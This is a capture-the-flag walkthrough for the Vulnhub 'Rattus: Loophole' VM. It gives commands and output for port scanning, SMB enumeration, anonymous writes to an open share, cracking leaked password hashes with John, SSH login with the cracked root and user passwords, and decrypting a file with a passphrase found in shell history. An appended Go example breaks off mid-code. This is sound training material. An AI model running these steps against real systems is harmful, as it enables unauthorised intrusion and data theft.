Rattus: Loophole Walkthrough

Loophole is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
Hi everyone!
Recently I’ve created my own Live CD and would like to get some feedback from you. This Live CD, codename Loophole, is meant to show you how important it is to keep your software up to date and properly configured. There’s more than one way into the system and each one of them will teach you different network/computer security related topics.
Scenario for Loophole Live CD:
We suspect that someone inside Rattus labs is working with known terrorist group. Your mission is to infiltrate into their computer network and obtain encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission.

Set the IP address of the attacker machine

root@kali:~# ifconfig eth0 10.8.7.6 netmask 255.255.255.248

Identify the IP address of Rattus: Loophole machine
Nmap Ping Scan

root@kali:~# nmap -PR -sn 10.8.7.0/29
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-16 14:36 EDT
Nmap scan report for 10.8.7.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:68:39:C6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.8.7.6
Host is up.
Nmap done: 8 IP addresses (2 hosts up) scanned in 0.44 seconds
root@kali:~#

Identify services running on Rattus: Loophole machine

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 10.8.7.2

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-16 15:41 EDT
NSE: Loaded 144 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating ARP Ping Scan at 15:41
Scanning 10.8.7.2 [1 port]
Completed ARP Ping Scan at 15:41, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 13.00s elapsed
Initiating Connect Scan at 15:41
Scanning 10.8.7.2 [65535 ports]
Discovered open port 80/tcp on 10.8.7.2
Discovered open port 139/tcp on 10.8.7.2
Discovered open port 445/tcp on 10.8.7.2
Discovered open port 113/tcp on 10.8.7.2
Discovered open port 22/tcp on 10.8.7.2
Completed Connect Scan at 15:41, 3.04s elapsed (65535 total ports)
Initiating Service scan at 15:41
Scanning 5 services on 10.8.7.2
Completed Service scan at 15:43, 146.15s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.8.7.2
NSE: Script scanning 10.8.7.2.
Initiating NSE at 15:43
Completed NSE at 15:44, 30.47s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 1.03s elapsed
Nmap scan report for 10.8.7.2
Host is up (0.0013s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.4 (protocol 1.99)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 2048 0b:95:f5:59:5b:63:d3:54:5f:45:5f:50:ee:34:23:6d (RSA1)
| 1024 3b:00:56:67:53:9c:d4:b6:cb:5f:b5:b9:94:35:c5:c9 (DSA)
|_ 2048 78:14:ca:10:4d:e9:57:d0:52:a5:99:75:02:e7:30:33 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.31 ((Unix) PHP/4.4.4)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE CONNECT OPTIONS PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK TRACE
|_ Potentially risky methods: PUT DELETE CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK TRACE
|_http-server-header: Apache/1.3.31 (Unix) PHP/4.4.4
|_http-title: Loophole - Rattus labs
113/tcp open ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:68:39:C6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Uptime guess: 0.013 days (since Sun Jul 16 15:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: -2h00m03s, deviation: 0s, median: -2h00m03s
| nbstat: NetBIOS name: LOOPHOLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOOPHOLE<00> Flags: <unique><active>
| LOOPHOLE<03> Flags: <unique><active>
| LOOPHOLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: plaintext-only (dangerous)
|_ message_signing: supported
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 1.26 ms 10.8.7.2

NSE: Script Post-scanning.
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.68 seconds
Raw packets sent: 36 (2.546KB) | Rcvd: 32 (2.150KB)
root@kali:~#

Port 139/tcp — netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)

Run enum4linux

root@kali:~# enum4linux 10.8.7.2
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 16 17:08:10 2017

==========================
| Target Information |
==========================
Target ........... 10.8.7.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


================================================
| Enumerating Workgroup/Domain on 10.8.7.2 |
================================================
[+] Got domain/workgroup name: WORKGROUP

========================================
| Nbtstat Information for 10.8.7.2 |
========================================
Looking up status of 10.8.7.2
LOOPHOLE <00> - B <ACTIVE> Workstation Service
LOOPHOLE <03> - B <ACTIVE> Messenger Service
LOOPHOLE <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

=================================
| Session Check on 10.8.7.2 |
=================================
[+] Server 10.8.7.2 allows sessions using username '', password ''

=======================================
| Getting domain SID for 10.8.7.2 |
=======================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

==================================
| OS information on 10.8.7.2 |
==================================
[+] Got OS info for 10.8.7.2 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
[+] Got OS info for 10.8.7.2 from srvinfo:
LOOPHOLE Wk Sv PrQ Unx NT SNT Samba server by Rattus labs
platform_id : 500
os version : 4.9
server type : 0x809a03

=========================
| Users on 10.8.7.2 |
=========================
index: 0x1 RID: 0x7d0 acb: 0x00000010 Account: mhog Name: Mark Hog,+38599112911,,Ilica 13 Desc: (null)

user:[mhog] rid:[0x7d0]

=====================================
| Share Enumeration on 10.8.7.2 |
=====================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Sharename Type Comment
--------- ---- -------
homes Disk Home directories
tmp Disk Temporary file space
IPC$ IPC IPC Service (Samba server by Rattus labs)

Server Comment
--------- -------
LOOPHOLE Samba server by Rattus labs

Workgroup Master
--------- -------
WORKGROUP

[+] Attempting to map shares on 10.8.7.2
//10.8.7.2/homes [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.8.7.2/tmp Mapping: OK, Listing: OK
//10.8.7.2/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
do_list: [\*] NT_STATUS_NETWORK_ACCESS_DENIED

================================================
| Password Policy Information for 10.8.7.2 |
================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


==========================
| Groups on 10.8.7.2 |
==========================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

===================================================================
| Users on 10.8.7.2 via RID cycling (RIDS: 500-550,1000-1050) |
===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-877857752-1703807887-1587427169
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-877857752-1703807887-1587427169 and logon username '', password ''
S-1-5-21-877857752-1703807887-1587427169-500 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-501 LOOPHOLE\nobody (Local User)
S-1-5-21-877857752-1703807887-1587427169-502 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-503 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-504 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-505 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-506 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-507 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-508 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-509 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-510 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-511 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-512 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-513 LOOPHOLE\None (Domain Group)
S-1-5-21-877857752-1703807887-1587427169-514 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-515 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-516 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-517 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-518 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-519 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-520 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-521 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-522 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-523 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-524 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-525 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-526 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-527 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-528 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-529 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-530 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-531 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-532 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-533 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-534 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-535 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-536 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-537 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-538 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-539 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-540 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-541 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-542 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-543 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-544 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-545 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-546 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-547 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-548 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-549 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-550 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1000 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1001 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1002 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1003 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1004 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1005 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1006 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1007 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1008 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1009 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1010 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1011 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1012 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1013 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1014 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1015 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1016 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1017 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1018 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1019 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1020 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1021 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1022 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1023 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1024 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1025 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1026 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1027 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1028 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1029 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1030 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1031 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1032 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1033 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1034 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1035 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1036 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1037 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1038 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1039 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1040 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1041 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1042 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1043 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1044 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1045 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1046 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1047 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1048 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1049 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-500 Unix User\mhog (Local User)
S-1-22-1-501 Unix User\tskies (Local User)
S-1-22-1-502 Unix User\jsummer (Local User)

=========================================
| Getting printer info for 10.8.7.2 |
=========================================
No printers returned.


enum4linux complete on Sun Jul 16 17:08:27 2017

root@kali:~#

Run nbtscan

root@kali:~# nbtscan 10.8.7.2
Doing NBT name scan for addresses from 10.8.7.2

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.8.7.2 LOOPHOLE <server> LOOPHOLE 00:00:00:00:00:00
root@kali:~#

Run smbclient

root@kali:~# smbclient -L 10.8.7.2
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Sharename Type Comment
--------- ---- -------
homes Disk Home directories
tmp Disk Temporary file space
IPC$ IPC IPC Service (Samba server by Rattus labs)

Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Server Comment
--------- -------
LOOPHOLE Samba server by Rattus labs

Workgroup Master
--------- -------
WORKGROUP LOOPHOLE
root@kali:~#

Enumerating the shares

root@kali:~# smbclient -I 10.8.7.2 "//LOOPHOLE/tmp" -U "" -N
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
smb: \> ls
. D 0 Sun Jul 16 14:55:40 2017
.. D 0 Sun Jul 16 16:36:06 2017
session_mm_apache0.sem N 0 Sun Jul 16 14:36:22 2017
.X11-unix DH 0 Sun Jul 16 14:36:12 2017
.ICE-unix DH 0 Sun Jul 16 14:36:12 2017

618136 blocks of size 1024. 614164 blocks available
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average -nan kb/s)
smb: \> ls
. D 0 Sun Jul 16 14:59:50 2017
.. D 0 Sun Jul 16 16:36:06 2017
test.txt A 0 Sun Jul 16 14:59:50 2017
session_mm_apache0.sem N 0 Sun Jul 16 14:36:22 2017
.X11-unix DH 0 Sun Jul 16 14:36:12 2017
.ICE-unix DH 0 Sun Jul 16 14:36:12 2017

618136 blocks of size 1024. 614164 blocks available
smb: \> exit
root@kali:~#

The tmp share is world-writable: an anonymous session can upload files to it.

Port 80/tcp — http Apache httpd 1.3.31 ((Unix) PHP/4.4.4)

Run dirb

root@kali:~# dirb http://10.8.7.2
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jul 16 14:45:23 2017
URL_BASE: http://10.8.7.2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.8.7.2/ ----
+ http://10.8.7.2/~operator (CODE:403|SIZE:275)
+ http://10.8.7.2/~root (CODE:403|SIZE:271)
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37650)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)

---- Entering directory: http://10.8.7.2/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Jul 16 14:45:26 2017
DOWNLOADED: 4612 - FOUND: 9
root@kali:~#

Going through various files

http://10.8.7.2/
http://10.8.7.2/info
http://10.8.7.2/status
http://10.8.7.2/garbage

The garbage file contains password hashes, so it can be passed to John the Ripper to crack them.

Crack passwords using John

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt Desktop/garbage --format=aix-smd5
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (aix-smd5, AIX LPA {smd5} (modified crypt-md5) [MD5 32/32])
Remaining 2 password hashes with 2 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
nostradamus (tskies)
albatros (root)

2g 0:00:00:17 DONE (2017-07-16 15:07) 0.1148g/s 3197p/s 5177c/s 5177C/s albatros
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Port 22/tcp — ssh OpenSSH 4.4 (protocol 1.99)

Log in as root

root@kali:~# ssh root@10.8.7.2
The authenticity of host '10.8.7.2 (10.8.7.2)' can't be established.
RSA key fingerprint is SHA256:/ImnGb3SLVVKTlS5WKtqBWqlng2kEqe+lQFbKjMe+j4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.8.7.2' (RSA) to the list of known hosts.
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
root@10.8.7.2's password: 
Last login: Wed Feb 16 11:20:48 2011
===========================================================
WELCOME TO RATTUS LABS
===========================================================
I'm here to serve you MASTER ...
===========================================================
[root@loophole]$  ls
Desktop/ loadlin16c.txt loadlin16c.zip
[root@loophole]$ find / -name Private.doc.enc
/mnt/live/memory/images/home.lzm/home/tskies/Private.doc.enc
/home/tskies/Private.doc.enc
[root@loophole]$ file /home/tskies/Private.doc.enc
/home/tskies/Private.doc.enc: data
[root@loophole]$
[root@loophole]$ cat .bash_history
[root@loophole]$

We found Private.doc.enc in the home directory of tskies.

Let's log in as tskies

root@kali:~# ssh tskies@10.8.7.2
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
tskies@10.8.7.2's password: 
Last login: Wed Feb 16 08:52:46 2011
===========================================================
WELCOME TO RATTUS LABS
===========================================================
I'm here to serve you MASTER ...
===========================================================
[tskies@loophole]$  ls
Desktop/ Private.doc.enc temp/
[tskies@loophole]$ cat .bash_history
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
startx
nano .bash_history
exit
[tskies@loophole]$ openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
[tskies@loophole]$ ls
Desktop/ Private.doc Private.doc.enc temp/
[tskies@loophole]$ which nc
which: no nc in (/usr/local/bin:/usr/bin:/bin:/usr/games:/usr/lib/java/bin:/usr/lib/java/jre/bin:/usr/lib/qt/bin:.)
[tskies@loophole]$
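The decryption step above depends only on the passphrase: openssl enc writes an 8-byte "Salted__" header, an 8-byte salt and the AES-256-CBC ciphertext, and derives key and IV from the passphrase plus that public salt. The Go program below is an added example, not part of the original walkthrough, that reproduces this file format with the legacy MD5 key derivation (the default before OpenSSL 1.1.0 and what -md md5 selects on newer builds); the passphrase, salt and plaintext are constructed sample values. It shows why a passphrase left in .bash_history is equivalent to handing over the key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"errors"
	"fmt"
)

// Header OpenSSL writes before the 8-byte salt in every "enc" output file.
const saltedMagic = "Salted__"

// evpBytesToKey is the legacy OpenSSL KDF (MD5, one iteration, `-md md5`):
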